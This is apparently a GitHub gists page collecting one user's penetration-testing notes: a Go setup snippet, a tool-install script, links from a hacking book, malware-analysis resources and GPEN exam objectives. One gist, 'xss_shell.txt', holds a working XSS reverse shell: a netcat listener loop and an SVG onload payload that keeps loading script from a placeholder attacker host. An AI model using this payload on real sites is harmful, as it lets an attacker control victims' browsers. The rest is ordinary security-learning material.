setrus’s gists

setrus / Go Environemnt Installation

Created January 9, 2020 10:21

Install GO Environmnet

	wget https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
	sudo tar -xvf go1.13.3.linux-amd64.tar.gz
	sudo mv go /usr/local

	export GOROOT=/usr/local/go
	export GOPATH=$HOME/go
	export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
	go version
	go env

setrus / To Watch

Created November 12, 2019 15:01

vulnerability-lab

https://www.vulnerability-lab.com/

setrus / Bug Bounty methodology

Created November 7, 2019 14:40 — forked from cyberheartmi9/Bug Bounty methodology

setrus / pentest.sh

Created November 7, 2019 14:34 — forked from OffXec/pentest.sh

Installs pentesting tools, then symlinks them to be ran seamlessly.

	#/bin/bash

	git clone https://github.com/danielmiessler/SecLists.git /opt/seclists

	git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
	sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
	chmod +x /opt/xsstrike/xsstrike.py

	git clone https://github.com/s0md3v/Arjun.git /opt/arjun
	sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun

setrus / content_discovery_all.txt

Created November 7, 2019 14:30 — forked from jhaddix/content_discovery_all.txt

a masterlist of content discovery URLs and files (used most commonly with gobuster)

This file has been truncated, but you can view the full file.

setrus / xss_shell.txt

Created November 5, 2019 14:39 — forked from ivanvza/xss_shell.txt

XSS Reverse Shell

	Attacker: while :; do printf "j$ "; read c; echo $c \| nc -lp PORT >/dev/null; done
	Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

setrus / hpb3_links.txt

Created November 4, 2019 09:03 — forked from audibleblink/hpb3_links.txt

All links from Hacker Playbook 3, with bit.ly links unfurled

	Document infos:
	- Author = Peter Kim
	- CreationDate = D:20180505020009+00'00'
	- Creator = calibre 2.69.0 [https://calibre-ebook.com]
	- Pages = 308
	- Producer = calibre 2.69.0 [https://calibre-ebook.com]
	- Title = The Hacker Playbook 3: Practical Guide To Penetration Testing
	- dc = {'publisher': ['Secure Planet'], 'description': {'x-default': None}, 'language': ['en'], 'creator': ['Peter Kim'], 'title': {'x-default': 'The Hacker Playbook 3: Practical Guide To Penetration Testing'}, 'date': ['2018-05-01T00:00:00+02:00'], 'subject': []}
	- http://calibre-ebook.com/xmp-namespace = {'timestamp': '2018-05-03T18:05:43.134685+02:00', 'author_sort': 'Kim, Peter'}
	- xap = {'Identifier': ['\n '], 'MetadataDate': '2018-05-05T04:00:09.811485+02:00'}

setrus / Malware Analysis

Created November 1, 2019 11:34

Information on Malware analysis

	https://www.sans.org/reading-room/whitepapers/threats/malware-analysis-environment-design-artitecture-1841
	https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
	https://oalabs.openanalysis.net/2018/07/16/oalabs_malware_analysis_virtual_machine/

setrus / gist:16d40c503d2181d072eb95d4f6fac338

Created September 28, 2019 04:05

PwnThyBytes Opimal CTF experience

setrus / GPEN Knowledge

Last active April 25, 2019 13:33

GPEN

	Exam Certification Objectives and Outcome Statements
	1. Advanced Password Attacks
	- The candidate will be able to user additional methods to attack password hashes and authenticate

	2. Attacing Password hashes
	- The candidate will be able to obtain and attack passwords hashes and other password representations

	3. Escalation and Exploitation
	- The candidate will be able to demonstrate the fundamental conepts of exploitation, data exfiltratrion from compromised hosts and pivoting to exploit other hosts within a target network.

setrus setrus